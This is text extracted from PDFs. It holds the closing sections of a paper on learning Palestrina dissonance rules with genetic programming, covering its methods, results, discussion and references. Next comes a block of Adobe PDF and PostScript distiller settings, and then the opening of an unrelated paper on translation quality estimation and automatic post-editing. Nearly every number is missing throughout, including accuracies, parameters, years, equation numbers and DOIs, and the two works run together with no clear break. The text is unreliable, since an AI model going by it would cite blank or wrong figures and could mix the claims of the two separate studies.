changed by mutations). the following input variables can be used in the learnt rules: the duration of the dissonant note (durationi), its predecessor (durationi� ) and successor (durationiþ ); the normalised pitch class of the dissonance; the intervals between the dissonance and its predecessor (intervalpre) and successor (intervalsucc); and the accent weight of the dissonance (accentweighti). as for the ephemeral random constants, there are the boolean constants true and false, as well as integer constants in the form of values between and . the notation given here is the notation shown later in learnt rule examples. there are many choices of operators and parameters that can be used with gp. here, we follow standard approaches that are commonly used in the gp practitioners’ community, and/or are deap defaults, unless otherwise noted. the population is created using ramped half-and-half initialisation, after which at each generation the following operators are applied. for selection, we use tournament selection with a tournament size of . for mutation, there is a choice between three operators: standard random tree mutation ( % probability), a duplication operator that creates two copies of the tree and connects them using the ^ operator ( . %), and a similar duplication operator using the a melodic interval is always computed as the interval between a given note and its predecessor and positive when the next note is higher. anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/deap/deap https://github.com/deap/deap http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ _ operator ( . %). for recombination, there is again a choice between standard tree exchange crossover ( %), an operator that returns the first individual unchanged, and a combination of the first and second individual using the ^ operator ( . %), and a similar operator using _ ( . %). while random tree mutation and tree exchange crossover are commonly used, we designed the other operators to encourage the emergence of rules that are conjunctions or disjunctions of more simple rules, which is a useful format for formal compositional rules. without these operators, it would be extremely unlikely that a new simple rule could be evolved without disrupting the already evolved one, or that different already evolved rules could be combined as a whole. a static depth limit of is imposed on the evolving trees to avoid stack overflows and exceedingly long execution times. a population of individuals is evolved for , generations. the fitness assigned to an individual is times its accuracy score (described above) minus . times the size of its tree. that way, among two rules with equal classification accuracy, the more compact rule has a slight fitness advantage. we introduced this as a measure to slow down the growth of the trees during evolution (known as ‘bloat control’ in the field of gp, although the effect of this particular measure is not very strong). we performed five runs for every cluster. they use the same set of learning examples, but find different rules nonetheless due to the stochastic nature of gp. after a run is finished, the best rule evolved in that run is output together with its classification accuracy scores . results quantitative evaluation the quality of the rule learning process as implemented by gp is evaluated by measuring the accuracies of the best evolved rules (see fig. ). it can be seen that the accuracies for positive examples are better than % in most cases, the accuracies on negative examples from other clusters are mostly better than %, the accuracies on negative examples without dissonances are mostly better than %, the accuracies on random counterexamples are close to %, and the accuracies for modified positive examples are mostly better than % but around % for the first cluster. when plotting overall accuracy scores against the sizes of the rules’ corresponding gp trees (fig. ), it can be seen that rules for the same cluster achieve similar accuracy scores despite different sizes. however, across clusters, there seems to be a negative correlation between accuracy and rule size. the most plausible explanation seems to be that larger clusters are more difficult to describe, resulting both in larger rule sizes and lower accuracy scores (fig. ). the accuracy of some negative examples (i.e. examples without dissonances, and modified positive examples) might be lower, because some of them may accidentally match the pattern of positive examples. qualitative evaluation we evaluated the suitability of the evolved rules for describing dissonances by using them as melodic constraints in small constraint problems implemented with the music constraint system cluster engine (http://github.com/tanders/clusterengine), which is a the evolved rules from all runs, together with their qualitative evaluatiuon, can be found in the file ‘resulting rules.pdf’ in the supplemental data, doi: . /zenodo. . anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://github.com/tanders/clusterengine https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure accuracies achieved by the champions of the genetic programming runs on the various parts of the training set. (a) postive examples; (b) counterexamples from other clusters; (c) harmonic counterexamples; (d) random counterexamples; (e) randomly modified positive examples. the means are indicated by blue bars. c –c denotes the clusters found by dbscan. these clusters correspond to different dissonance categories (see table ). c and c are two small clusters that were disregarded in the end (see discussion at the end of section ‘clustering results and discussion’ above). full-size doi: . /peerj-cs. /fig- anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ revision of the solver pwmc (sandred, ). both these solvers are libraries of the visual programming and composition environment pwgl (laurson, kuuskankare & norilo, ). the constraint problems consist of only three notes with the middle note as the dissonance and surrounding rests as padding so that these notes can occur freely on any beat. for each learnt rule (five per cluster resulting from the five runs reported above) we generated random solutions (an arbitrary number). we examined these solutions in common music notation, and appraised how well they complied with the respective dissonance category. specifically, we checked whether the metric position and duration of the middle note (the dissonance) and the melodic intervals into and from this note are appropriate. figure accuracy score vs tree size for the evolved solutions from all runs. clusters are denoted by their respective numbers. full-size doi: . /peerj-cs. /fig- figure accuracy score (a) and tree size (b) vs cluster size. clusters are denoted by their respective numbers. full-size doi: . /peerj-cs. /fig- anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for each cluster (dissonance category) at least one learnt rule constrains the treatment of the dissonant middle note in a way that either fully complies with the features of the corresponding positive examples (see table again), or is at least very close. in other words, this ‘best rule’ per cluster works either perfectly or at least rather well when used as a constraint for its dissonance category. table shows how accurate the best rule of each dissonance category is by reporting the greatest deviation found in any solution among a set of random solutions. the full qualitative evaluation results—together with the raw rule results—are available with the data provided with this paper (under resulting rules and evaluation). examples of learnt rules to give a better idea of the kind of rules learnt, figs. and show two examples. the rule of fig. constrains passing tones upwards and that of fig. suspensions on beat . these specific rules have been selected, because they are relatively short. both rules are the best out of their set of in the sense just discussed above, and the qualitative evaluation of their results is included in table . the rules generated by deap were slightly simplified manually and with mathematica, and translated into standard mathematical notation for clarity. table qualitative evaluation summary: greatest deviation found between features of positive examples (see table ) and solutions to best rule for each cluster. cluster category st interval nd interval metric position duration c passing tones down none none none none c passing tones up none none none none c suspension on beat none none none smalla c suspension on beat smallb none none smalla c lower neighbour tone smallc none none none notes: a rule also allows for eighth note (ideally it would only allow for a quarter or half note). b rule also allows for a minor second down (ideally it would only allow for pitch repetition). c rule also allows for a repetition (ideally it would only allow for a downward step). durationi− < durationi + ( ) ∧ accentweighti < . ( ) ∧ · accentweighti < durationi− ( ) ∧ accentweighti < intervalpre ( ) ∧ accentweighti < intervalsucc ( ) ∧ durationi < ( ) ∧ accentweighti · durationi+ < durationi ( ) ∧ intervalpre < ( ) ∧ intervalsucc < ( ) figure learnt rule example from c : passing tones upwards. full-size doi: . /peerj-cs. /fig- anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as an example, let us analyse the first rule, which constraints upwards passing tones (fig. ). the other rule in fig. can be analysed similarly. remember that for this dissonance category the dissonance occurs on a weak beat, both intervals lead upwards stepwise, and its duration is up to a half note (table ). this rule constrains all those aspects exactly (table ). the names of the input variables and their possible values have been explained above, but we will briefly revise them below for the reader’s convenience. note that the learnt rules contain some bloat—expressions that are irrelevant or redundant. in our analysis we will focus on the meaningful expressions of the rule. remember that each rule states conditions that must hold between three consecutive melodic notes if the middle note is a dissonance. the dissonance occurs on the note with the index i, for example, accentweighti is the accent weight of the dissonance. the rule in fig. constrains dissonances to a weak beat. for the first beat of a measure, the accent weight is . , for the third beat in it is . , of the second and forth beat it is . and so on. the rule constrains accentweighti—the weight of the dissonance—to less than . , that is, to a weak beat, see line ( ) of the rule. the rule enforces that both the melodic interval into the dissonance and out of it, intervalpre and intervalsucc (measured in semitones) are positive (upwards). the rule happens to express this by constraining that these intervals are greater than accentweighti, see eqs. ( ) and ( ), and accentweighti is always greater than by its definition. both intervals are less than , see eqs. ( ) and ( ). so, in summary the intervals are positive (upwards), but at most two semitones (steps). the duration must be a half note or shorter. durations are measured in music ’s quarterlengths, where represents a quarter note. the duration of the dissonance must be less than , which corresponds to a dotted half note ( ), hence it can be a half note at most. discussion during the course of our project we gradually improved the resulting rules. the negative examples in the training set for the rule learning have a great impact on the accuracy of resulting rules. for example, the inclusion of slightly modified transformations of positive examples clearly improved the accuracy as compared to preliminary experiments. a closer investigation into the impact of automatically generated negative examples on the accuracy of resulting rules could lead to further improvement. for example, so far we only used slight random variations of the note durations and melodic intervals to ≥ |intervalsucc| ∧ accentweighti ≥ ∧ ( < durationi ∨ durationi− ≥ ) ∧ ( ≥ durationi ∨ durationi− < ) ∧ intervalpre < accentweighti ∧ intervalpre > intervalsucc figure learnt rule example from c : suspension on beat . full-size doi: . /peerj-cs. /fig- the variable names where introduced above when discussing terminal nodes in the subsection ‘learning process’ and their possible values earlier in the sub- section ‘data given to machine learning’. anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ generate negative examples, but variations of further parameters could also be useful (e.g. negative examples with shifted metric positions could also restrict syncopations). multiple rules learnt for the same cluster differ in their accuracy when used as a constraint for music generation: the music generated with these rules (during qualitative evaluation) can be more or less close to the features of the positive examples (see table ). table only reports the accuracy of the best rule per cluster. some other rules for the same cluster are much less accurate, but nevertheless obtain a very similar overall weighted score in the learning process. currently, we lack an algorithm for measuring the accuracy of a rule in terms of how similar generated music restricted by that rule is compared with its positive examples. such an algorithm would be very useful to contribute to the fitness calculation of rules during the learning process. the accuracy of resulting rules can also be improved by taking further background knowledge into account. for example, some resulting rules allow for syncopations in dissonance categories where these would not occur in palestrina, for example, at a passing tone. providing the rule learning algorithm with an extra boolean feature whether the dissonant note is syncopated or not will likely avoid that. a further improvement could probably be obtained by post-processing large clusters generated by dbscan with another clustering algorithm that is not based on density alone, or by dbscan with a smaller setting for maximum neighbour distance, to split them up into smaller clusters, for which learning a suitable rule should be easier. from the perspective of gp research, we demonstrate a simple yet powerful way of performing symbolic regression on heterogeneous data. a combination of gp and clustering is used to achieve that. these two techniques have occasionally been used together for various purposes. some similarity to our approach can be found in the work by kattan, agapitos & poli ( ), who use a top-level genetic programmming system to project data from a complex problem domain onto a two-dimensional space, then apply k-means clustering several times with different target cluster numbers to subdivide the problem set, then use the best clustering (as determined by a clustering quality measure) to run a lower level gp system on each cluster. this method was introduced against a background of techniques other than clustering that had already been applied to what is termed problem decomposition for gp. the authors demonstrate superior performance on a set of benchmarks problems against gp without clustering. later, kattan, fatima & arif ( ) extend this approach for event prediction in time series. by using a density based clustering algorithm, and applying it directly on the input data, we achieve something similar with a much simpler system. this is partly due to the fact that the density parameter is not difficult to set. of course, if it were more difficult to set, clustering quality metrics could also be used for that purpose along with the manual evaluation of clustering quality based on domain knowledge that we have applied here. conclusions human composition education and composition practice commonly combine guidance from compositional rules and insights learnt from musical examples. by contrast, while rule-based approaches on the one hand, and approaches based on ml on the other hand anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ have been often employed in the field of algorithmic composition, these approaches have rarely been combined. in this paper, we propose a method that automatically extracts symbolic compositional rules from a music corpus. this method is based on gp, a ml technique using an evolutionary algorithm. the resulting rules can be analysed by humans or used in rule- based algorithmic composition systems. in this study, we extracted rules that detail the dissonance treatment in compositions by palestrina. we derived rules for the following five dissonance categories (automatically derived clusters): passing tones on a weak beat upwards and downwards; lower neighbour tones on a weak beat; and suspensions on the strong beat one and beat three in ‘metre’. learnt rules typically match between % and % of the positive training examples, while excluding between % and % of the counterexamples depending on counterexample category and cluster (dissonance category), with better results for smaller clusters. learnt rules describe melodic features of the dissonance categories very well, though some of the resulting best rules allow for minor deviations compared with the positive examples (e.g. allowing the dissonance category of suspension to occur on shorter notes as well). acknowledgements we want to thank dmitri tymoczko, who suggested the initial idea for an algorithm that detects dissonances in renaissance music. we are also grateful for the detailed and valuable feedback of two reviewers. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � torsten anders conceived and designed the experiments, performed the experiments, analysed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � benjamin inden conceived and designed the experiments, performed the experiments, analysed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: torsten anders, & benjamin inden. ( , october ). supplemental files for article: machine learning of symbolic compositional rules with genetic programming: dissonance treatment in palestrina. zenodo. doi . /zenodo. . anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ references anders t, miranda er. . constraint programming systems for modeling music theories and composition. acm computing surveys ( ): – doi . / . . anglade a, dixon s. . characterisation of harmony with inductive logic programming. in: ismir. philadelphia, – . ariza c, cuthbert ms. . modeling beats, accents, beams, and time signatures hierarchically with music meter objects. in: proceedings of the international computer music conference, icmc , new york, usa. ann arbor: michigan publishing, – . baker d. . david baker’s jazz improvisation. revised edition. van nuys: alfred publishing. cuthbert ms, ariza c. . music : a toolkit for computer-aided musicology and symbolic music data. in: proceedings of the th international society for music information retrieval conference, ismir . utrecht: international society for music information retrieval, seaver institute, – . da palestrina gp. . le opere complete. per cura e studio di raffaele casimiri. vol. . rome: fratelli scalera. ebcioglu k. . computer counterpoint. in: proceedings of the international computer music conference . san francisco: international computer music association, – . ester m, kriegel h-p, sander j, xu x. . density-based algorithm for discovering clusters in large spatial databases with noise. in: proceedings of the second international conference on knowledge discovery and data mining (kdd- ). munich: aaai press, – . fernández jd, vico f. . ai methods in algorithmic composition: a comprehensive survey. journal of artificial intelligence research : – doi . /jair. . fortin f-a, de rainville f-m, gardner m-ag, parizeau m, gagné c. . deap: evolutionary algorithms made easy. journal of machine learning research ( ): – . fux jj. . the study of counterpoint. from johann joseph fux’s gradus ad parnassum. london: w.w. norton & company. orig. , translated and edited by alfred mann. hiller l, isaacson l. . musical composition with a high-speed digital computer. in: schwanauer sm, lewitt da, eds. machine models of music. cambridge: mit press, – reprint of original articel in journal of audio engineering society, . jeppesen k. . counterpoint: the polyphonic vocal style of the sixteenth century. new york: prentice-hall. trans. by g. haydon, dover reprint . jeppesen k. . the style of palestrina and the dissonance. second edition. new york: oxford university press. trans. by e. j. dent, dover reprint . johanson b, poli r. . gp-music: an interactive genetic programming system for music generation with automated fitness raters. technical report csrp- - , university of birmingham. kattan a, agapitos a, poli r. . unsupervised problem decomposition using genetic programming. in: esparcia-alcazar ai, ekart a, silva s, dignum s, uyar as, eds. european conference on genetic programming, istanbul, turkey. berlin: springer-verlag, – . kattan a, fatima s, arif m. . time-series event-based prediction: an unsupervised learning framework based on genetic programming. information sciences : – doi . /j.ins. . . . koza jr. . genetic programming: on the programming of computers by means of natural selection. cambridge: mit press. krumhansl cl. . cognitive foundations of musical pitch. new york: oxford university press. anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://dx.doi.org/ . /jair. http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ laurson m, kuuskankare m, norilo v. . an overview of pwgl, a visual programming environment for music. computer music journal ( ): – doi . /comj. . . . . morales e, morales r. . learning musical rules. in: widmer g, ed. proceedings of the ijcai- international workshop on artificial intelligence and music, th international joint conference on artificial intelligence (ijcai- ), menlo park, ca, usa. montreal: american association for artificial intelligence, – . muggleton s, de raedt l, poole d, bratko i, flach p, inoue k, srinivasan a. . ilp turns . machine learning ( ): – doi . /s - - - . patrick ph, strickler k. . a computer-assisted study of dissonance in the masses of josquin desprez. computers and the humanities ( ): – doi . /bf . pedregosa f, varoquaux g, gramfort a, michel v, thirion b, grisel o, blondel m, prettenhofer p, weiss r, dubourg v, vanderplas j, passos a, cournapeau d, brucher m, perrot m, duchesnay e. . scikit-learn: machine learning in python. journal of machine learning research : – . poli r, langdon wb, mcphee nf. . a field guide to genetic programming. morrisville, nc: lulu.com. ramirez r, perez a, kersten s, rizo d, roman p, inesta jm. . modeling violin performances using inductive logic programming. intelligent data analysis ( ): – doi . /ida- - . sandred Ö. . pwmc, a constraint-solving system for generating music scores. computer music journal ( ): – doi . /comj. . . . . sapp cs. . computational methods for the analysis of musical structure. phd thesis, stanford university. schmidt m, lipson h. . distilling free-form natural laws from experimental data. science ( ): – doi . /science. . schottstaedt w. . automatic counterpoint. in: mathews mv, pierce jr, eds. current directions in computer music research. cambridge: the mit press, – . sigler a, wild j, handelman e. . schematizing the treatment of dissonance in th-century counterpoint. in: proceedings of the th international society for music information retrieval conference, ismir . málaga, – . spector l, alpern a. . criticism, culture, and the automatic generation of artworks. in: proceedings of the twelfth national conference on artificial intelligence, aaai- . seattle, – . tobudic a, widmer g. . relational ibl in music with a new structural similarity measure. in: proceedings of the international conference on inductive logic programming. szeged: springer, – . anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /comj. . . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /bf http://dx.doi.org/ . /ida- - http://dx.doi.org/ . /comj. . . . http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ machine learning of symbolic compositional rules with genetic programming: dissonance treatment in palestrina introduction background methods results discussion conclusions flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice pushing the limits of translation quality estimation andré f. t. martins unbabel instituto de telecomunicações lisbon, portugal andre.martins@unbabel.com marcin junczys-dowmunt adam mickiewicz university in poznań poznań, poland junczys@amu.edu.pl fabio n. kepler unbabel l f/inesc-id, lisbon, portugal university of pampa, alegrete, brazil kepler@unbabel.com ramón astudillo unbabel l f/inesc-id lisbon, portugal ramon@unbabel.com chris hokamp dublin city university dublin, ireland chokamp@computing.dcu.ie roman grundkiewicz adam mickiewicz university in poznań poznań, poland romang@amu.edu.pl abstract translation quality estimation is a task of growing importance in nlp, due to its poten- tial to reduce post-editing human effort in dis- ruptive ways. however, this potential is cur- rently limited by the relatively low accuracy of existing systems. in this paper, we achieve remarkable improvements by exploiting syn- ergies between the related tasks of word-level quality estimation and automatic post-editing. first, we stack a new, carefully engineered, neural model into a rich feature-based word- level quality estimation system. then, we use the output of an automatic post-editing sys- tem as an extra feature, obtaining striking re- sults on wmt : a word-level f mult score of . % (an absolute gain of + . % over the current state of the art), and a pearson correla- tion score of . % for sentence-level hter prediction (an absolute gain of + . %). introduction the goal of quality estimation (qe) is to evaluate a translation system’s quality without access to ref- erence translations (blatz et al., ; specia et al., ). this has many potential usages: informing an end user about the reliability of translated con- tent; deciding if a translation is ready for publish- ing or if it requires human post-editing; highlighting the words that need to be changed. qe systems are particularly appealing for crowd-sourced and pro- fessional translation services, due to their potential to dramatically reduce post-editing times and to save labor costs (specia, ). the increasing interest in this problem from an industrial angle comes as no surprise (turchi et al., ; de souza et al., ; martins et al., ; kozlova et al., ). in this paper, we tackle word-level qe, whose goal is to assign a label of ok or bad to each word in the translation (figure ). past approaches to this problem include linear classifiers with handcrafted features (ueffing and ney, ; biçici, ; shah et al., ; luong et al., ), often combined with feature selection (avramidis, ; beck et al., ), recurrent neural networks (de souza et al., ; kim and lee, ), and systems that com- bine linear and neural models (kreutzer et al., ; martins et al., ). we start by proposing a “pure” qe system (§ ) consisting of a new, carefully en- gineered neural model (neuralqe), stacked into a linear feature-rich classifier (linearqe). along the way, we provide a rigorous empirical analysis to better understand the contribution of the several groups of features and to justify the architecture of the neural system. a second contribution of this paper is bring- ing in the related task of automatic post-editing (ape; simard et al. ( )), which aims to au- transactions of the association for computational linguistics, vol. , pp. – , . action editor: stefan riezler. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. source the sharpen tool sharpens areas in an image . mt der schärfen-werkezug bereiche in einem bild schärfer erscheint . pe (reference) mit dem scharfzeichner können sie einzelne bereiche in einem bild scharfzeichnen . qe bad bad ok ok ok ok bad bad ok ‖ hter = . % figure : example from the wmt word-level qe training set. shown are the english source sentence, the german translation (mt), its manual post-edition (pe), and the conversion to word quality labels made with the tercom tool (qe). words labeled as ok are shown in green, and those labeled as bad are shown in red. we also show the hter (fraction of edit operations to produce pe from mt) computed by tercom. tomatically correct the output of machine transla- tion (mt). we show that a variant of the ape sys- tem of junczys-dowmunt and grundkiewicz ( ), trained on a large amount of artificial “roundtrip translations,” is extremely effective when adapted to predict word-level quality labels (yielding apeqe, § ). we further show that the pure and the ape- based qe system are highly complementary (§ ): a stacked combination of linearqe, neuralqe, and apeqe boosts the scores even further, leading to a new state of the art on the wmt and wmt datasets. for the latter, we achieve an f mult score of . %, which represents an absolute improvement of + . % over the previous best system. finally, we provide a simple word-to-sentence conversion to adapt our system to sentence-level qe. this results in a new state of the art for human- targeted translation error rate (hter) prediction, where we obtain a pearson’s r correlation score of . % (+ . % absolute gain), and for sentence ranking, which achieves a spearman’s ρ correlation score of . % (+ . %). we complement our findings with error analysis that highlights the syn- ergies between pure and ape-based qe systems. datasets and system architecture datasets. for developing and evaluating our sys- tems, we use the datasets listed in table . these datasets have been used in the qe and ape tasks in wmt – (bojar et al., , ). they span two language pairs (english-spanish and english-german) and two different domains (news translations and information technology). we used the standard train, development and test splits. each split contains the source and automatically trans- lated sentences (which we use as inputs), the manu- publicly available at http://www.statmt.org/ wmt and http://www.statmt.org/wmt . ally post-edited sentences (output for the ape task), and a sequence of ok/bad quality labels, one per each translated word (output for the word-level qe task); see figure . besides these datasets, for training the ape system we make use of artificial roundtrip translations; this will be detailed in § . evaluation. for all experiments, we report the of- ficial evaluation metrics of each dataset’s year. for wmt , the official metric for the word-level qe task is the f score of the bad labels (f bad ). for wmt , it is the product of the f scores for the ok and bad labels (denoted f mult ). for sentence- level qe, we report the pearson’s r correlation for hter prediction and the spearman’s ρ correlation score for sentence ranking (graham, ). from post-edited sentences to quality labels. in the datasets above, the word quality labels are ob- tained automatically by aligning the translated and the post-edited sentence with the tercom soft- ware tool (snover et al., ) , with the default settings (tokenized, case insensitive, exact matching only, shifts disabled). this tool computes the hter (the normalized edit distance) between the translated and post-edited sentence. as a by-product, it aligns the words in the two sentences, identifying substitu- tion errors, word deletions (i.e. words omitted by the translation system), and insertions (redundant words in the translation). words in the mt output that need to be edited are marked by the bad quality labels. the fact that the quality labels are automatically obtained from the post-edited sentences is not just an artifact of these datasets, but a procedure that is highly convenient for developing qe systems in an industrial setting. manually annotating word-level quality labels is time-consuming and expensive; on the other hand, post-editing translated sentences is http://www.cs.umd.edu/˜snover/tercom. dataset language pair # sents # words wmt , train en-es , , wmt , dev en-es , , wmt , test en-es , , wmt , train en-de , , wmt , dev en-de , , wmt , test en-de , , table : datasets used in this work. commonly part of the workflow of crowd-sourced and professional translation services. thus, getting quality labels for free from sentences that have al- ready been post-edited is a much more realistic and sustainable process. this observation suggests that we can tackle word-level qe in two ways: . pure qe: run the ter alignment tool (i.e. ter- com) on the post-edited data, and then train a qe system directly on the generated quality la- bels; . ape-based qe: train an ape system on the original post-edited data, and at runtime use the ter aligment tool to convert the automatically post-edited sentences to quality labels. from a machine learning pespective, qe is a se- quence labeling problem (i.e., whose output se- quence has a fixed length and a small number of labels), while ape is a sequence-to-sequence prob- lem (where the output is of variable length and spans a large vocabulary). therefore, we can regard ape-based qe as a “projection” of a more complex and fine-grained output (ape) into a simpler output space (qe). ape-based qe systems have the poten- tial for being more powerful since they are trained with this finer-grained information (provided there is enough training data to make them generalize well). we report results in § confirming this hypothesis. our system architecture, described in full detail in the following sections, consists of state of the art pure qe and ape-based qe systems, which are then combined to yield a new, more powerful, qe system. pure quality estimation the best performing system in the wmt word- level qe task was developed by the unbabel team (martins et al., ). it is a pure but rather com- plex qe system, ensembling a linear feature-based classifier with three different neural networks with different configurations. in this section, we provide a simpler version of their system, by replacing the three ensembled neural components by a single one, which we engineer in a principled way. we evaluate the resulting system on additional data (wmt in addition to wmt ), covering a new language pair and a new content type. overall, we obtain a slightly higher accuracy with a much simpler system. in this section, we describe the linear (§ . ) and neural (§ . ) components of our system, as well as their combination (§ . ). . linear sequential model we start with the linear component of our model, a discriminative feature-based sequential model (called linearqe), based on martins et al. ( ). the system receives as input a tuple 〈s,t,a〉, where s = s . . .sm is the source sentence, t = t . . . tn is the translated sentence, and a ⊆ {(m,n) | ≤ m ≤ m, ≤ n ≤ n} is a set of word alignments. it predicts as output a sequence ŷ = y . . .yn , with each yi ∈{bad, ok}. this is done as follows: ŷ = arg max y n∑ i= w>φu(s,t,a,yi) + n+ ∑ i= 